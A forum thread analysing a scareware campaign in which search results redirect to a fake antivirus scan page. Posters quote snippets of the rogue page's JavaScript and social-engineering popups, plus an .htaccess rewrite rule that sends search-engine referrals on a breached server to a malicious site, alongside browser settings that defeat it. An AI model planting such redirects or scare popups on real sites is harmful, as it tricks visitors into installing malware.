Search Engine Redirects to Malware Continue

I found this with the Yahoo search engine. A similar search of Google revealed that Google had cleaned up all traces of this particular site which had infected a number of people in the past two days.

Clicking on the link in the Yahoo Search redirected me a fake AV scan page.

​

Note that there is no information filled in about threats and actions. This is because the exploit using the animated scan followed by the popup windows requires scripting to be enabled. With scripting configured per-site, the exploit will not work.

To demonstrate, I enabled scripting for the Yahoo Search Page:

​

Then I clicked on the link which redirected me to the site as above. Scripting is disabled:

​

Here are the javascript files which start the exploit:

Code:

<title>My computer Online Scan</title>

< script type="text/javascript" src="img/jquery.js"></ script>

< script type="text/javascript" src="img/jquery-init.js"></ script>

< script type="text/javascript" src="img/[B]listfile.js[/B]"></ script>

< script type="text/javascript" src="img/drugndrop.js"></ script>

Here are some of the files that are included in the listfile.js file. These would appear in the "Now Scanning" box on the fake scan page to trick the user into thinking an actual scan was taking place:

Code:

var gs=new Array();
gs[0] = '$winnt$.inf';
gs[1] = '12520437.cpx';
gs[2] = '12520850.cpx';
gs[3] = '6to4svc.dll';
gs[4] = 'aaaamon.dll';
gs[5] = 'aaclient.dll';
gs[6] = 'AboutRepliGo.dll';
gs[7] = 'ac3acm.acm';
gs[8] = 'access.cpl';
gs[9] = 'acctres.dll';
gs[10] = 'accwiz.exe';
gs[11] = 'acelpdec.ax';
gs[12] = 'acledit.dll';
gs[13] = 'aclui.dll';
gs[14] = 'activeds.dll';
gs[15] = 'activeds.tlb';
gs[16] = 'actmovie.exe';
gs[17] = 'actxprxy.dll';

Here is some of the javascript code -- instructions for the popup boxes, etc:

Code:

< script>

function hideWarnDialog()
if(confirm('Dont close this window, if your want you PC to be protected.'))	{
	
{alert('Harmful and malicious software detected. These programs may damage your computer 
and steal your private information. Online Security Scanner requires Personal Antivirus 
components to repair your computer. 
Please click Ok to download and install Personal Antivirus tool. ');

These redirect exploits to rogue security products, whether from a search page, or from a site compromised with SQL injected code,
do not work when the browser is properly configured.


----
rich

 

site seems down now.

 

These exploits are very clever. You can't go directly to the rogue site. You have to encounter the search hit, whereupon you are redirected.

Hovering the mouse over the link in the Yahoo Search Results reveals that the Yahoo syntax puts the URL at the end. The malware people generate the hit and include their own URL.

​

From here, the redirect takes place from traac.com and the user is taken to the rogue site. Going directly to traac.com, or reliable-scanner01.com wihtout the appended syntax, gets you nowhere. This adds to the difficulty in trying to trace this stuff.

----
rich

 

It's a simple server-side modification, designed to make it harder for site administrators and regular visitors to realise a website has been breached.... The malicious party gets access to the server that the website you are trying to visit is hosted on....once they have access, they modify the .htaccess file like so:

Code:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://url of malicious site to redirect to goes here [R,L]

Result is any traffic to the website from any of the main search engines will redirect you to the fake scan page.... If you use something to mask your referrer (as in completely remove it or mangle it), this hack will not affect your browsing session. Any direct access to the site will also bypass the .htaccess condition and you will be allowed to browse the site you were intending to visit freely.

 

Thanks Rmus. It works really.

Wish some one could test it via IE 8 on Windows7.

 

Thanks for the explanation!

----
rich

 

I just remembered from an earlier referrer exploit from last year: If I disable "Send Referrer Information" and/or "Enable Redirection" the exploit doesn't work.

Here, I disable both. First I see the redirect error. Note the URL when I hover the mouse over "Here":

​

When I click on "Here" I'm taken to the traac.com site where a series of lists are maintained with keywords that help rank the search hits:

​

If I disable "Referrer" and enable "Redirection" I'm taken directly to this same list.

In both cases, the "Send Referrer Information" is required for the exploit to work, as you point out.

----
rich

 

Completely off-topic, but I had to ask. Rmus, "Opera for the Masses"?

 

Customized Title Bar!

----
rich